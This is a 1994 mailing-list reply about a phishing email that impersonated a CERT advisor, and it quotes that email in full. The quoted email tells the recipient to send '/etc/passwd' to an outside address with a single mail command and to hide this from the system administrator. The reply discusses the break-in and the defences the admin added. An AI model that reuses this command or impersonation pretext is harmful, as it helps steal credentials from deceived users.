On Sun, 23 Oct 1994, Douglas R. Floyd wrote: > I got this in the mail today (10-23). > Seems like someone is knocking on io.com now. > > (The forward to paris is normal as mail gets forwarded there.) > > BEGIN FUNKY MESSAGE -------- > > >From vanepp@sfu.ca Sun Oct 23 00:00:56 1994 > Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP > (931110.SGI/930416.SGI.AUTO) > for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500 > Received: from trance.helix.net > by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92) > id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500 > From: vanepp@sfu.ca > Received: from (helix.net [142.231.37.2]) by trance.helix.net > (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for > dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700 > Message-Id: <199410230433.VAA07859@trance.helix.net> > Date: Sat, 22 Oct 1994 14:22:25 > To: dfloyd@pentagon.io.com > Subject: Very Important > Status: RO > > Dear user, > > It is imperative that I attain your /etc/passwd file > immediately. It is for security reasons. You can mail > it to me by typing: > > mail vanepp@sfu.ca < /etc/passwd > > Do not tell your system administrator. I am > conducting an investigation on your system. Thank you > > Your identity will be kept confidential. I guarantee it > > Thank you for your cooperation. > > Peter Van Epp Technical Systems Operations > CERT Security Advisor > vanepp@sfu.ca > > > END FUNKY MESSAGE ----- > > I send cert@cert.org a copy, as well as the admins at io.com. > > I know this was posted earlier, but I think this is another address, > possibly an MX record as I could not telnet or finger sfu.ca. Hi. Yes, someone broke into an account here at Helix, and seems to have a grudge against one or more people. Vanepp in particular. Argh. This is the third mailbomb. I'm supposed to be in charge of security; how do you protect against this??!? We're using shadow passwords as of tonight, and tcp wrappers as of last month. The bugger keeps signing on via modem, and this is a problem. We can't afford callerid. -- Charles Howes -- chowes@helix.net Always tell the truth, then you make it the other bloke's problem! - Sean Connery, 1971